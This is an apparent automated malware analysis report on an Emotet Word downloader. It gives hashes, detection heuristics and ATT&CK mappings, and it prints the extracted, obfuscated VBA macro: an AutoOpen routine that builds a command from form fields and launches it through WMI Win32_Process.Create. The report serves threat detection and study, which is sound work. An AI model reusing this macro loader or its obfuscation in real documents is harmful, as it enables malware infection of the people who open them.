Emotet Office (OLE) malware analysis — malicious · fd411887ec3579d7

MALICIOUS

Office (OLE)

99.1 KB Created: 2019-05-07 10:12:00 Authoring application: Microsoft Office Word First seen: 2019-12-09

MD5: d3d05efd06a788667fbd125aeccba949 SHA-1: f2fcbe3af0f333d0e2617e8b3fbd193044902d65 SHA-256: fd411887ec3579d7a22f11a4d8a0984a451ce3f7ccd9f9bc0225ea2c12bd9f3c

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Windows Management Instrumentation T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6964647-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize GetObject and CreateObject to launch a WMI process, specifically targeting Win32_Process. This indicates the macro is designed to execute arbitrary commands or download additional payloads. The autoopen macro is present, which is a common execution vector for malicious Office documents.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-6964647-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6964647-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5093 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5093 bytes
SHA-256: `c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "b1720618" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "w1578953" Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "E22014" Attribute VB_Name = "D8773492" Attribute VB_Name = "A580701" Attribute VB_Name = "o_8234" Attribute VB_Name = "A27379" Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "T_4460" Function D14061(W7471584) While b844381_ And s0130958 'Y569_00E62_464c800410G802_90 Wend While a05_90 And m9_446_1 'w59_966M01__83_J_60987Z6044669 Wend While w3_85_ And j230273 'F4502230W4881749G615384Y59272_ Wend Set D14061 = CVar(W7471584) While n7700522 And H668505 'T57_8915X808160h067184A77_80 Wend While B36304 And M608_92 'q0_54_o4056579X2099243i04190 Wend End Function Sub _ autoopen() On Error Resume Next While f42799 And L7704099 'w254697c01847_k4823_08l424_2 Wend While z0679462 And S458956 'h02504_p213892m4346364k50024 Wend While K680621_ And U_7399 'Q39211L0620631H761671A5188101 Wend Call U2939849 While V24_38 And l_53838 'V27225L92014_N04__279w485_0 Wend While w29_804 And Z0320_2 'z43877Y1834991U4645895w82878 Wend While l43461 And j874849 'B199761w3__27D2__8649f5179_75 Wend End Sub Attribute VB_Name = "Y0498310" Function U2939849() On Error Resume Next While B31857 And Z36_1091 'P32532q598634a466103S71186 Wend While R13623_1 And A371943 'l2___683K335660v7758237v98698 Wend While I61794 And c42461 'V630213j492_92i_000740b4119_ Wend p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText While l_0568 And R44923_ 'a64_551j18718A049625F431446 Wend While Z8631279 And t1259084 'B25_5323j__2521c20510d708298 Wend While c_61158 And f906094 'r06871z776893u_72221K8_948 Wend Set G5633975 = D14061(GetObject("winmgmt" _ + "s:Wi" + "n3" _ + "2_Pr" _ + "ocess")) While D326073 And L24085 'K143790Q6256_29C83_624j55_227 Wend While M09705 And d801881_ 'U__9248_h149_27Y23820X74_678 Wend G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779 While X3_067_ And j9_5696 'b16603M59_7932j_09630O78902_4 Wend While T61109_1 And d02334 'X99512_W56_2_Y830942b98324 Wend While p65608 And j_36__78 'o0_0971d446_507r6461317z62707 Wend End Function Attribute VB_Name = "T9365707" Public Function T54591() While F76090 And w044579 'w43028D86__94S14822L6109_52 Wend While I41891 And E880_46 'R342908J9159_49V7_2266j2__029 Wend While B44_493 And V770134_ 's06956_4Z58414__v480_19_h126886 Wend Set T54591 = D14061(GetObject("winmgmt" _ + "s:Wi" + "n3" + "2_Pr" _ + "ocess" + "S" + "tartup")) While X913926 And T11742 'M3078876F34_055Q08158r79_70 Wend While G94793 And o9582444 'c565 ... (truncated)

SHA-256: c3bd8705570cfe60c9ef7b57347b3ac54b9f3dffd27e268ab3322f0b01349bcc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "b1720618"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "w1578953"
Attribute VB_Base = "0{C1A5688F-8A34-49B0-8F55-EFF4989335E6}{FDAD0313-DC72-4D8D-8329-E9DB31704FB0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "E22014"

Attribute VB_Name = "D8773492"

Attribute VB_Name = "A580701"

Attribute VB_Name = "o_8234"

Attribute VB_Name = "A27379"
Attribute VB_Base = "0{F37157B9-92D7-41B0-BE30-F0B26FE70DA9}{B38EA070-32C4-4A7B-8DA2-156978FE509A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "T_4460"
Function D14061(W7471584)
         While b844381_ And s0130958
'Y569_00E62_464c800410G802_90
      Wend
         While a05_90 And m9_446_1
'w59_966M01__83_J_60987Z6044669
      Wend
         While w3_85_ And j230273
'F4502230W4881749G615384Y59272_
      Wend
Set D14061 = CVar(W7471584)
         While n7700522 And H668505
'T57_8915X808160h067184A77_80
      Wend
         While B36304 And M608_92
'q0_54_o4056579X2099243i04190
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While f42799 And L7704099
'w254697c01847_k4823_08l424_2
      Wend
         While z0679462 And S458956
'h02504_p213892m4346364k50024
      Wend
         While K680621_ And U_7399
'Q39211L0620631H761671A5188101
      Wend
Call U2939849
         While V24_38 And l_53838
'V27225L92014_N04__279w485_0
      Wend
         While w29_804 And Z0320_2
'z43877Y1834991U4645895w82878
      Wend
         While l43461 And j874849
'B199761w3__27D2__8649f5179_75
      Wend
End Sub


Attribute VB_Name = "Y0498310"
Function U2939849()
On Error Resume Next
         While B31857 And Z36_1091
'P32532q598634a466103S71186
      Wend
         While R13623_1 And A371943
'l2___683K335660v7758237v98698
      Wend
         While I61794 And c42461
'V630213j492_92i_000740b4119_
      Wend
p206810 = w1578953.q64548 + A27379.A12063 + w1578953.q64548.ControlTipText + A27379.S0817563 + w1578953.q64548.PasswordChar + w1578953.q64548.PasswordChar + A27379.Z64636 + w1578953.q64548 + w1578953.q64548 + A27379.P5218__ + w1578953.q64548.ControlTipText + A27379.I0_71767 + w1578953.q64548.ControlTipText
         While l_0568 And R44923_
'a64_551j18718A049625F431446
      Wend
         While Z8631279 And t1259084
'B25_5323j__2521c20510d708298
      Wend
         While c_61158 And f906094
'r06871z776893u_72221K8_948
      Wend
Set G5633975 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" _
+ "2_Pr" _
+ "ocess"))
         While D326073 And L24085
'K143790Q6256_29C83_624j55_227
      Wend
         While M09705 And d801881_
'U__9248_h149_27Y23820X74_678
      Wend
G5633975.Create X85006 + p206810 + c51171, O924005_, T54591, j735779
         While X3_067_ And j9_5696
'b16603M59_7932j_09630O78902_4
      Wend
         While T61109_1 And d02334
'X99512_W56_2_Y830942b98324
      Wend
         While p65608 And j_36__78
'o0_0971d446_507r6461317z62707
      Wend
End Function


Attribute VB_Name = "T9365707"

Public Function T54591()
         While F76090 And w044579
'w43028D86__94S14822L6109_52
      Wend
         While I41891 And E880_46
'R342908J9159_49V7_2266j2__029
      Wend
         While B44_493 And V770134_
's06956_4Z58414__v480_19_h126886
      Wend
Set T54591 = D14061(GetObject("winmgmt" _
+ "s:Wi" + "n3" + "2_Pr" _
+ "ocess" + "S" + "tartup"))
         While X913926 And T11742
'M3078876F34_055Q08158r79_70
      Wend
         While G94793 And o9582444
'c565
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.